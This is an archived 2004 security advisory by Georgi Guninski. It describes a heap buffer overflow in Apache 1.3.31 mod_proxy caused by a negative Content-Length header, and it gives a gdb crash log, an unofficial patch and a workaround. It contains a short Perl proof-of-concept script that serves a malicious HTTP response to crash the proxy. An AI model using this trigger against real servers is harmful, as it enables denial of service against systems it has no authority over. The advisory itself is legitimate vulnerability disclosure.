exploit the possibilities

modproxy1.html

modproxy1.html
Posted Jun 14, 2004
Authored by Georgi Guninski | Site guninski.com

The version of mod_proxy shipped with Apache 1.3.31 and possibly earlier versions are susceptible to a buffer overflow via the Content-Length: header. This can lead to a denial of service and possible compromise of a vulnerable system.

tags | advisory, denial of service, overflow
MD5 | e7d78d7a935f0a2ce17af90ae82bf0ba

modproxy1.html

Change Mirror Download
<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Buffer overflow in apache mod_proxy,yet still apache much
better than windows
</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2><span></span>Buffer overflow in apache mod_proxy,yet still apache
much better than windows<span></span></h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" nowrap="nowrap" width="16%"
bgcolor="#f1f0ef"><img src="logo2.gif" alt="cyrillic logo"> <br>
<a href="index.html">Home</a> <br>
<b>Security</b> <br>
<a href="browsers.html" class="sux">Internet Explorer</a> <br>
<a href="win2k.html" class="sux">Windows 2000</a> <br>
<a href="exploit.html">AIX</a> <br>
<a href="netscape.html">Netscape</a> <br>
<a href="misc.html">Misc</a> <br>
<b>Other</b> <br>
<a href="greets.html">Links</a> <br>
<a href="me.html">Services</a> <br>
<a href="menews.html">In the news</a> <br>
<a href="rand/index.html">Random stuff</a> <br>
<b>Contact</b> <br>
<a href="mailto:guninski@guninski.com">guninski@guninski.com</a></td>
<td valign="top" width="84%">
<div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #69, 2004<br>
<br>
Buffer overflow in apache mod_proxy,yet still apache much better than
windows<br>
<br>
Systems affected:<br>
modproxy from apache 1.3.31 and earlier<br>
<br>
Risk:&nbsp; Unknown - at least a crash, exploitability unknown<br>
Date: 10 June 2004<br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You&nbsp; may&nbsp; not&nbsp; modify&nbsp;&nbsp;&nbsp; it&nbsp;&nbsp;
and&nbsp;&nbsp; distribute&nbsp;&nbsp;&nbsp; it&nbsp;&nbsp;
or&nbsp;&nbsp; distribute&nbsp;&nbsp; parts of it without the author's
written permission - this especially&nbsp; applies&nbsp; to so called
"vulnerabilities databases"&nbsp; and&nbsp; securityfocus,&nbsp;
microsoft,&nbsp;&nbsp;&nbsp; cert and mitre.<br>
If&nbsp;&nbsp; you&nbsp;&nbsp; want&nbsp;&nbsp;&nbsp;
to&nbsp;&nbsp;&nbsp; &nbsp;link&nbsp;&nbsp;&nbsp;
&nbsp;to&nbsp;&nbsp;&nbsp; this&nbsp;&nbsp;&nbsp;
content&nbsp;&nbsp;&nbsp; &nbsp; use&nbsp;&nbsp;&nbsp;
&nbsp;the&nbsp;&nbsp;&nbsp; URL:<br>
<a href="http://www.guninski.com/modproxy1.html">http://www.guninski.com/modproxy1.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The&nbsp; information&nbsp; in&nbsp; this&nbsp; advisory&nbsp; is&nbsp;
believed&nbsp;&nbsp; to&nbsp;&nbsp; be&nbsp;&nbsp; true&nbsp;&nbsp;
though it may be false.<br>
The opinions&nbsp; expressed&nbsp; in&nbsp; this&nbsp; advisory&nbsp;
and&nbsp; program&nbsp; are&nbsp;&nbsp;&nbsp; my&nbsp; own and
not&nbsp;&nbsp; of&nbsp;&nbsp; any&nbsp;&nbsp;&nbsp;
&nbsp;company.&nbsp;&nbsp;&nbsp; The&nbsp;&nbsp; usual&nbsp;&nbsp;
standard&nbsp;&nbsp; disclaimer&nbsp;&nbsp;&nbsp; applies, especially
the fact that Georgi Guninski&nbsp; is&nbsp; not&nbsp; liable&nbsp;
for&nbsp;&nbsp;&nbsp; any&nbsp; damages caused by direct&nbsp; or&nbsp;
indirect&nbsp;&nbsp;&nbsp; use&nbsp; of&nbsp; the&nbsp;
information&nbsp; or&nbsp; functionality provided&nbsp; by&nbsp;
this&nbsp; advisory&nbsp; or&nbsp; program.&nbsp;&nbsp;&nbsp; Georgi
Guninski&nbsp;&nbsp; bears&nbsp;&nbsp; no responsibility for&nbsp;
content&nbsp; or&nbsp; misuse&nbsp; of&nbsp; this&nbsp; advisory&nbsp;
or&nbsp; program&nbsp; or any derivatives thereof.<br>
<br>
Description:<br>
<br>
There is a buffer overflow in modproxy. It is heap based memcpy with
negative size.<br>
<br>
Details:<br>
<br>
The problem is in proxy_util.c:<br>
&nbsp;<code>n = ap_bread(f, buf, MIN((int)buf_size,<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
(int)(len - total_bytes_rcvd)));</code><br>
<br>
clearly len can be negative.<br>
ap_bread leads to memcpy.<br>
<br>
Exploitation is unknown, but at least Freebsd 5.2.1 seems promising.<br>
The freebsd memcpy implementation copies backwards in this case, which
means that by playing with len it is possible to do copy from X to X+K
where K seems indepedent of len and X is about half the address space
on x86.<br>
Apache does some code execution after SEGV, which may be another
exploit vector.<br>
<br>
Some of the apache guys believe this bug is not exploitable, but they
didn't give a proof.<br>
<br>
To reproduce make apache fetch the output of pro3.pl.<br>
log from freebsd 5.2.1:<br>
<br>
<samp>Program received signal SIGSEGV, Segmentation fault.<br>
0x281c0113 in memcpy () from /lib/libc.so.5<br>
(gdb) info stack<br>
#0&nbsp; 0x281c0113 in memcpy () from /lib/libc.so.5<br>
#1&nbsp; 0x00000000 in ?? ()<br>
(gdb) p/x $esi<br>
$1 = 0xbbbffffe<br>
(gdb) p/x $edi<br>
$3 = 0xbbc05424<br>
(gdb) x/i $eip<br>
0x281c0113 <memcpy+67>: repz movsl %ds:(%esi),%es:(%edi)</samp><br>
<br>
---pro3.pl------<br>
<code>#!/usr/bin/perl<br>
<br>
# copyright Georgi Guninski<br>
# cannot be used in vulnerabilities databases an CVE - especially <br>
# securityfocus and mitre<br>
<br>
print "HTTP/1.1 200 MSUX\r\n";<br>
my $sta= -1213253396 ;<br>
print "Content-Length: " . $sta ."\r\n";<br>
print "\r\n";<br>
print "v" x 33000;</code><br>
----------------<br>
<br>
Fix:<br>
<br>
Unofficial fix from me, use at your risk.<br>
-------------------------------------<br>
<code>diff -u apache_1.3.31/src/modules/proxy/proxy_util.c
apache_1.3.31my/src/modules/proxy/proxy_util.c<br>
---
apache_1.3.31/src/modules/proxy/proxy_util.c&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Feb 17 23:52:22 2004<br>
+++
apache_1.3.31my/src/modules/proxy/proxy_util.c&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Tue Jun&nbsp; 8 11:24:15 2004<br>
@@ -545,8 +545,8 @@<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
n = ap_bread(f, buf, buf_size);<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
else {<br>
-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
n = ap_bread(f, buf, MIN((int)buf_size,<br>
-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
(int)(len - total_bytes_rcvd)));<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
n = ap_bread(f, buf, MIN((size_t)buf_size,<br>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
(size_t)(len - total_bytes_rcvd)));<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }</code><br>
-------------------------------------<br>
<br>
Workaround:<br>
disable modproxy<br>
<br>
Vendor status:<br>
security@apache.org are aware of the bug<br>
<br>
Georgi Guninski<br>
http://www.guninski.com<br>
<br>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
<br>
&nbsp; <br>
&nbsp;
<center>
<p>| <a href="index.html">Home</a> | <a href="browsers.html">Internet
Explorer</a> | <a href="win2k.html">Windows 2000</a> | <a
href="exploit.html">AIX</a> | <a href="netscape.html">Netscape</a> | <a
href="greets.html">Links</a> | <a href="index.html">More...</a> |</p>
</center>
<p><br>
</p>
<br>
<br>
</body>
</html>
Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    1 Files
  • 27
    Sep 27th
    1 Files
  • 28
    Sep 28th
    20 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close